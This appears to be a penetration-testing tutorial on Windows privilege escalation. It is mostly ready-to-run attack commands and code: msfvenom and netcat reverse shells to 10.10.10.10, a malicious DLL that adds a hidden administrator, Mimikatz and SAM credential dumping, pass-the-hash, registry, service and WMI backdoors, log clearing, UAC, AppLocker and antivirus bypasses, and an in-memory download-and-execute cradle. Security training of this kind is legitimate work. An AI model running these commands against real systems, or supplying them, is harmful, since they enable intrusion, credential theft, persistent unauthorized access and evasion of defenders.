Windows Privilege Escalation - Comprehensive Guide

This guide provides a systematic approach to Windows privilege escalation, covering manual enumeration, automated tools, common vulnerabilities, and exploitation techniques used in real-world penetration testing scenarios.

1. Windows Privilege Levels
2. Information Gathering
3. Automated Enumeration Tools
4. Common Privilege Escalation Vectors
5. Quick Wins
6. Post-Exploitation
7. Maintaining Access

Windows Privilege Levels

Understanding Windows privilege levels is crucial for privilege escalation:

• Administrator (local) - Highest privileges on the local system
• Standard (local) - Limited access users, cannot make permanent system changes
• Guest - System access without being defined users
• Standard (domain) - Standard users within Active Directory, might have local admin rights
• Administrator (domain) - Highest privileges, can manage domain users
• SYSTEM - Not a real user, used by Windows for internal tasks. Highest privilege level

Information Gathering

User Enumeration

Essential commands for understanding user context:

 
# Current user information
whoami
whoami /priv         # Current user privileges
whoami /groups       # Group memberships
whoami /all          # Complete token information
 
 
# System users
net users            # List all users
net user username    # Details about specific user
qwinsta              # Logged in users
query user           # Alternative for logged users
 
 
# Groups
net localgroup       # List all groups
net localgroup groupname    # Members of specific group
net localgroup administrators    # Admin group members

System Information

Gather comprehensive system details:

 
# Operating system information
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"    # OS details only
systeminfo | findstr /B /C:"System Type"                # Architecture
 
 
# Environment variables
set                  # All environment variables
echo %PATH%          # PATH variable
echo %USERNAME%      # Current username
echo %COMPUTERNAME%  # Computer name
 
 
# PowerShell alternatives
Get-ComputerInfo
$env:computername
[System.Environment]::OSVersion.Version

Network Connections

Identify network services and connections:

 
# Network configuration
ipconfig /all        # Full network configuration
route print          # Routing table
arp -a              # ARP cache
 
 
# Active connections
netstat -ano        # All connections with PIDs
netstat -anob       # With executable names (requires admin)
netstat -an | findstr LISTENING    # Listening ports
 
 
# Firewall rules
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Service Enumeration

Services often run with elevated privileges:

 
# Service listing
sc query            # Running services
sc queryex type=service    # All services with details
wmic service list brief    # Brief service list
wmic service get name,displayname,pathname,startmode,startname
 
 
# Specific service details
sc qc servicename   # Configuration details
sc query servicename    # Service status

Scheduled Tasks

Tasks running with elevated privileges can be exploited:

 
# List all scheduled tasks
schtasks /query /fo LIST /v
 
 
# PowerShell alternative
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 
 
# Check specific task
schtasks /query /tn taskname /fo LIST /v

File and Directory Permissions

Find writable directories and files:

 
# Find writable directories
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
 
 
# PowerShell - Find writable directories
Get-ChildItem "C:\Program Files" -Recurse -Directory -ErrorAction SilentlyContinue | Get-ACL | ?{($_.Access|?{$_.IdentityReference -match "Everyone"}).FileSystemRights -match "FullControl"}

Registry Enumeration

Search for credentials and configuration issues:

 
# Search for passwords in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
 
 
# AlwaysInstallElevated check
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
 
 
# AutoRun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Patch Level

Identify missing security updates:

 
# List installed patches
wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn
 
 
# PowerShell alternative
Get-HotFix | Sort-Object -Property InstalledOn -Descending

Installed Software

Vulnerable software can provide escalation paths:

 
# List installed programs
wmic product get name,version,vendor
wmic product where "name like '%java%'" get name,version
 
 
# Alternative methods
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

Driver Information

Outdated drivers are common privilege escalation vectors:

 
# List drivers
driverquery
driverquery /v    # Verbose output
driverquery /fo csv | findstr /i "kernel"    # Kernel drivers
 
 
# PowerShell
Get-WindowsDriver -Online -All

Searching for Credentials

Look for stored credentials and sensitive files:

 
# Search for password files
findstr /si password *.txt *.xml *.config
findstr /si password *.txt *.xml *.config *.ini
 
 
# Common credential locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml
type C:\Windows\system32\sysprep\sysprep.inf
type C:\Windows\system32\sysprep\unattend.xml
type C:\Windows\system32\sysprep.inf
 
 
# PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 
 
# Saved credentials
cmdkey /list

Automated Enumeration Tools

WinPEAS

WinPEAS is a comprehensive Windows enumeration script:

 
# Run WinPEAS (often detected by AV)
winpeas.exe
winpeas.exe > output.txt    # Redirect output to file
 
 
# Quiet mode with specific checks
winpeas.exe quiet cmd

PowerUp

PowerShell privilege escalation framework:

 
# Bypass execution policy
powershell.exe -nop -exec bypass
 
 
# Import and run PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks    # Run all checks
 
 
# Specific checks
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService
Get-ServiceDetail

Windows Exploit Suggester

Runs on attacker machine to avoid detection:

 
# On target machine
systeminfo > systeminfo.txt
 
 
# On attacker machine
windows-exploit-suggester.py --update
windows-exploit-suggester.py --database 2023-10-15-mssb.xls --systeminfo systeminfo.txt

Seatbelt

Comprehensive security auditing tool:

 
# Basic checks
Seatbelt.exe -group=all
 
 
# Specific checks
Seatbelt.exe -group=user
Seatbelt.exe -group=system
Seatbelt.exe -group=misc

Common Privilege Escalation Vectors

1. Unquoted Service Paths

When service paths contain spaces without quotes:

 
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
 
 
# Check write permissions
icacls "C:\Program Files\Vulnerable Service\"
accesschk64.exe /accepteula -uwdq "C:\Program Files\Vulnerable Service\"
 
 
# Exploitation
 
# 1. Generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > malicious.exe
 
 
# 2. Place in writable path component
copy malicious.exe "C:\Program Files\malicious.exe"
 
 
# 3. Restart service
net stop servicename
net start servicename

2. Weak Service Permissions

Services with modifiable configurations:

 
# Find modifiable services
accesschk64.exe /accepteula -uwcqv "Authenticated Users" *
accesschk64.exe /accepteula -uwcqv "Everyone" *
 
 
# Check specific service
sc qc servicename
accesschk64.exe /accepteula -ucqv servicename
 
 
# Modify service binary path
sc config servicename binpath= "C:\temp\nc.exe -e cmd.exe 10.10.10.10 4444"
net stop servicename
net start servicename

3. DLL Hijacking

Applications loading DLLs from writable locations:

 
# Monitor DLL loading with ProcMon (requires admin on test system)
 
# Look for missing DLLs in writable directories
 
 
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > hijackme.dll
 
 
# Place in writable directory found by ProcMon
copy hijackme.dll "C:\Program Files\VulnerableApp\"
 
 
# Trigger by restarting service/application

Example C code for DLL:

#include <windows.h>
#include <stdlib.h>
 
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("cmd.exe /c net user hacker Password123! /add");
            system("cmd.exe /c net localgroup administrators hacker /add");
            break;
    }
    return TRUE;
}

4. AlwaysInstallElevated

If both registry keys are set:

 
# Check if vulnerable
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 
 
# Generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o malicious.msi
 
 
# Execute MSI
msiexec /quiet /qn /i malicious.msi

5. Registry AutoRun

Writable autorun registry keys:

 
# Check permissions
accesschk64.exe /accepteula -uvwqk HKLM\Software\Microsoft\Windows\CurrentVersion\Run
accesschk64.exe /accepteula -uvwqk HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
 
 
# Add malicious entry
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"

6. Scheduled Tasks

Writable scheduled task files:

 
# Find scheduled tasks
schtasks /query /fo LIST /v | findstr TaskName
schtasks /query /fo LIST /v | findstr "Task To Run"
 
 
# Check file permissions
icacls C:\Path\To\ScheduledTaskExecutable.exe
 
 
# Replace with malicious executable
move C:\Path\To\ScheduledTaskExecutable.exe C:\Path\To\ScheduledTaskExecutable.exe.bak
copy malicious.exe C:\Path\To\ScheduledTaskExecutable.exe

7. Token Impersonation

Exploiting SeImpersonate or SeAssignPrimaryToken privileges:

 
# Check current privileges
whoami /priv
 
 
# If SeImpersonate/SeAssignPrimaryToken is enabled:
 
# Use Juicy Potato (up to Windows Server 2016/Windows 10 1803)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
 
 
# Use PrintSpoofer (Windows Server 2019/Windows 10)
PrintSpoofer.exe -i -c cmd
 
 
# Use RoguePotato (Windows Server 2019/Windows 10)
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe /c net user hacker Password123! /add"

8. Saved Credentials

Windows credential manager and RunAs:

 
# List saved credentials
cmdkey /list
 
 
# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\admin "cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe"

9. SAM and SYSTEM Files

If you can read SAM and SYSTEM:

 
# Check permissions
icacls C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SYSTEM
 
 
# Copy files
copy C:\Windows\System32\config\SAM C:\temp\
copy C:\Windows\System32\config\SYSTEM C:\temp\
 
 
# Extract hashes offline
python3 secretsdump.py -sam SAM -system SYSTEM LOCAL

10. Pass the Hash

Using extracted NTLM hashes:

 
# Using pth-winexe
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 //10.10.10.10 cmd.exe
 
 
# Using Mimikatz
sekurlsa::pth /user:Administrator /domain:. /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

Quick Wins

Common Passwords

Check for default or weak passwords:

 
# Common usernames to try
net user administrator
net user admin
net user guest
 
 
# Try common passwords
runas /user:administrator cmd
 
# Password123!, Welcome123!, Password1, Admin123

Unattended Installation Files

Often contain plaintext passwords:

 
# Check common locations
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\system32\sysprep\unattend.xml
dir C:\Windows\system32\sysprep\sysprep.xml
 
 
# Search for answer files
dir /s /b C:\*.xml | findstr /i unattend
dir /s /b C:\*.txt | findstr /i password

Configuration Files

Application configs may contain credentials:

 
# Web config files
findstr /si connectionString *.config
findstr /si password *.config
 
 
# Common application paths
dir C:\inetpub\wwwroot\web.config
dir C:\xampp\passwords.txt
dir C:\xampp\mysql\bin\my.ini

Post-Exploitation

Extracting Credentials

Using Mimikatz:

 
# Basic usage
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
 
 
# From memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Using LaZagne:

 
# Extract all passwords
lazagne.exe all
 
 
# Specific modules
lazagne.exe browsers
lazagne.exe wifi
lazagne.exe windows

Persistence Techniques

1. Registry Persistence

 
# Run key persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe" /f
 
 
# Scheduled task persistence
schtasks /create /sc minute /mo 5 /tn "Windows Update" /tr "C:\Windows\Temp\backdoor.exe" /ru SYSTEM

2. Service Persistence

 
# Create service
sc create BackdoorService binpath= "C:\Windows\Temp\backdoor.exe" start= auto
sc start BackdoorService
 
 
# Modify existing service
sc config "Vulnerable Service" binpath= "cmd.exe /c C:\Windows\Temp\backdoor.exe"

3. WMI Persistence

 
# WMI event subscription
$FilterArgs = @{name='BotFilter82';
                EventNameSpace='root\CIMv2';
                QueryLanguage="WQL";
                Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";}
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
$ConsumerArgs = @{name='BotConsumer23';
                CommandLineTemplate="C:\Windows\Temp\backdoor.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs

Covering Tracks

 
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
 
 
# Clear PowerShell history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath
 
 
# Clear command history
doskey /history > nul

Maintaining Access

Creating Backdoor Users

 
# Create hidden user
net user hacker$ Password123! /add
net localgroup administrators hacker$ /add
net localgroup "Remote Desktop Users" hacker$ /add
 
 
# Hide from login screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker$ /t REG_DWORD /d 0 /f

Enable Remote Access

 
# Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
 
 
# Enable WinRM
winrm quickconfig -q
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}

Firewall Rules

 
# Add firewall exception
netsh advfirewall firewall add rule name="Backdoor" dir=in action=allow protocol=TCP localport=4444
 
 
# Disable firewall
netsh advfirewall set allprofiles state off

Defense Evasion

Bypassing UAC

 
# Using fodhelper
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe /c start C:\Windows\Temp\backdoor.exe" /f
fodhelper.exe
 
 
# Cleanup
reg delete HKCU\Software\Classes\ms-settings\ /f

Bypassing AppLocker

 
# Default writable directories bypassing AppLocker
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\Tasks\
C:\Windows\Temp\
 
 
# Using MSBuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
 
 
# Using InstallUtil
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

AV Evasion Techniques

 
# String obfuscation
$a = 'ams'; $b = 'iUtils'; iex "Import-Module $a$b"
 
 
# Base64 encoding
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.10/payload.ps1")'))
powershell.exe -EncodedCommand $encoded
 
 
# Download and execute in memory
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/payload.ps1')

Tool Usage Examples

AccessChk

 
# Check user permissions on services
accesschk64.exe /accepteula -uwcqv "Authenticated Users" *
 
 
# Check file/folder permissions
accesschk64.exe /accepteula -uwdq C:\
accesschk64.exe /accepteula -uwdq "C:\Program Files\"
 
 
# Check registry permissions
accesschk64.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services

PowerShell One-Liners

 
# Find all SUID files
Get-ChildItem -Path C:\ -Force -File -Recurse -ErrorAction SilentlyContinue | Get-Acl | Where-Object {$_.Owner -eq "NT AUTHORITY\SYSTEM"}
 
 
# Find world writable folders
Get-ChildItem -Path C:\ -Force -Directory -Recurse -ErrorAction SilentlyContinue | Get-Acl | Where-Object {$_.AccessToString -match "Everyone"}
 
 
# List all running processes with their owners
Get-Process -IncludeUserName | Select-Object ProcessName, UserName, Id
 
 
# Find installed patches
Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object HotFixID, InstalledOn, Description

Conclusion

Windows privilege escalation requires systematic enumeration, understanding of Windows security mechanisms, and knowledge of common misconfigurations. Always:

1. Start with thorough enumeration
2. Use automated tools to catch common issues
3. Manually verify findings
4. Document your path to privileges
5. Maintain operational security

Remember that in real engagements, stealth and avoiding detection are crucial. Choose techniques based on the environment and security controls in place.

Related Resources

• Active Directory Privilege Escalation
• Linux Comparison
• Security Tools
• Network Services